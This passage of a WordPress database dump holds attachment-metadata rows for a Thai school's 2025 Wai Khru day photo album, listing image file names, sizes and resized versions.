(3754,1337,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:721;s:4:\"file\";s:67:\"2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_6.jpg\";s:8:\"filesize\";i:292525;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันไหว้ครู-2568_250613_6-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17221;}s:5:\"large\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันไหว้ครู-2568_250613_6-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:131576;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันไหว้ครู-2568_250613_6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9227;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันไหว้ครู-2568_250613_6-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:82929;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันไหว้ครู-2568_250613_6-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21727;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3755,1338,'_wp_attached_file','2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_4.jpg'),
(3756,1338,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:67:\"2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_4.jpg\";s:8:\"filesize\";i:380925;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันไหว้ครู-2568_250613_4-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20821;}s:5:\"large\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันไหว้ครู-2568_250613_4-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:148948;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันไหว้ครู-2568_250613_4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8476;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันไหว้ครู-2568_250613_4-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:95063;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันไหว้ครู-2568_250613_4-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21873;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3757,1339,'_wp_attached_file','2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_2.jpg'),
(3758,1339,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:67:\"2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_2.jpg\";s:8:\"filesize\";i:348857;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันไหว้ครู-2568_250613_2-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19132;}s:5:\"large\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันไหว้ครู-2568_250613_2-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:136188;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันไหว้ครู-2568_250613_2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7948;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันไหว้ครู-2568_250613_2-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:86903;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันไหว้ครู-2568_250613_2-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19837;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3759,1340,'_wp_attached_file','2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_7.jpg'),
(3760,1340,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:721;s:4:\"file\";s:67:\"2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_7.jpg\";s:8:\"filesize\";i:243815;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันไหว้ครู-2568_250613_7-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13408;}s:5:\"large\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันไหว้ครู-2568_250613_7-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:105490;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันไหว้ครู-2568_250613_7-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7305;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันไหว้ครู-2568_250613_7-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:65388;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันไหว้ครู-2568_250613_7-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17012;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3761,1341,'_wp_attached_file','2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_8.jpg'),
(3762,1341,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:721;s:4:\"file\";s:67:\"2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_8.jpg\";s:8:\"filesize\";i:249590;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันไหว้ครู-2568_250613_8-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13824;}s:5:\"large\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันไหว้ครู-2568_250613_8-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:107912;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันไหว้ครู-2568_250613_8-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7325;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันไหว้ครู-2568_250613_8-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:67198;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันไหว้ครู-2568_250613_8-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17391;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3763,1342,'_wp_attached_file','2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_9.jpg'),
(3764,1342,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:721;s:4:\"file\";s:67:\"2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_9.jpg\";s:8:\"filesize\";i:260937;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันไหว้ครู-2568_250613_9-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16138;}s:5:\"large\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันไหว้ครู-2568_250613_9-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:120040;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันไหว้ครู-2568_250613_9-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7878;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันไหว้ครู-2568_250613_9-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:76311;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันไหว้ครู-2568_250613_9-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20735;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3765,1343,'_wp_attached_file','2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_12.jpg'),
(3766,1343,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:721;s:4:\"file\";s:68:\"2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_12.jpg\";s:8:\"filesize\";i:271379;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันไหว้ครู-2568_250613_12-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15442;}s:5:\"large\";a:5:{s:4:\"file\";s:69:\"LINE_ALBUM_วันไหว้ครู-2568_250613_12-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:121363;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันไหว้ครู-2568_250613_12-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7549;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันไหว้ครู-2568_250613_12-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:76276;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันไหว้ครู-2568_250613_12-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19768;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3767,1344,'_wp_attached_file','2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_10.jpg'),
(3768,1344,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:721;s:4:\"file\";s:68:\"2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_10.jpg\";s:8:\"filesize\";i:305526;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันไหว้ครู-2568_250613_10-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16709;}s:5:\"large\";a:5:{s:4:\"file\";s:69:\"LINE_ALBUM_วันไหว้ครู-2568_250613_10-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:136136;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันไหว้ครู-2568_250613_10-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8652;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันไหว้ครู-2568_250613_10-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:84784;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันไหว้ครู-2568_250613_10-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21721;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3769,1345,'_wp_attached_file','2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_11.jpg'),
(3770,1345,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:721;s:4:\"file\";s:68:\"2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_11.jpg\";s:8:\"filesize\";i:309687;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันไหว้ครู-2568_250613_11-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16985;}s:5:\"large\";a:5:{s:4:\"file\";s:69:\"LINE_ALBUM_วันไหว้ครู-2568_250613_11-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:137837;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันไหว้ครู-2568_250613_11-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8704;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันไหว้ครู-2568_250613_11-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:85627;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันไหว้ครู-2568_250613_11-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21934;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3771,1346,'_wp_attached_file','2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_13.jpg'),
(3772,1346,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:721;s:4:\"file\";s:68:\"2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_13.jpg\";s:8:\"filesize\";i:252487;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันไหว้ครู-2568_250613_13-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14621;}s:5:\"large\";a:5:{s:4:\"file\";s:69:\"LINE_ALBUM_วันไหว้ครู-2568_250613_13-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:111561;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันไหว้ครู-2568_250613_13-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7571;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันไหว้ครู-2568_250613_13-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:70172;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันไหว้ครู-2568_250613_13-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18462;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3773,1347,'_wp_attached_file','2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_14.jpg'),
(3774,1347,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:721;s:4:\"file\";s:68:\"2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_14.jpg\";s:8:\"filesize\";i:291983;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันไหว้ครู-2568_250613_14-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16866;}s:5:\"large\";a:5:{s:4:\"file\";s:69:\"LINE_ALBUM_วันไหว้ครู-2568_250613_14-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:131868;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันไหว้ครู-2568_250613_14-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9224;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันไหว้ครู-2568_250613_14-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:83289;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันไหว้ครู-2568_250613_14-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21571;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3775,1348,'_wp_attached_file','2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_15.jpg'),
(3776,1348,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:721;s:4:\"file\";s:68:\"2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_15.jpg\";s:8:\"filesize\";i:289446;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันไหว้ครู-2568_250613_15-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17654;}s:5:\"large\";a:5:{s:4:\"file\";s:69:\"LINE_ALBUM_วันไหว้ครู-2568_250613_15-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:131907;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันไหว้ครู-2568_250613_15-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8743;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันไหว้ครู-2568_250613_15-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:83918;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันไหว้ครู-2568_250613_15-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21866;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3777,1349,'_wp_attached_file','2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_16.jpg'),
(3778,1349,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:721;s:4:\"file\";s:68:\"2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_16.jpg\";s:8:\"filesize\";i:251445;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันไหว้ครู-2568_250613_16-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14163;}s:5:\"large\";a:5:{s:4:\"file\";s:69:\"LINE_ALBUM_วันไหว้ครู-2568_250613_16-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:109550;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันไหว้ครู-2568_250613_16-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6410;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันไหว้ครู-2568_250613_16-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:68121;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันไหว้ครู-2568_250613_16-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17696;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3779,1350,'_wp_attached_file','2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_17.jpg'),
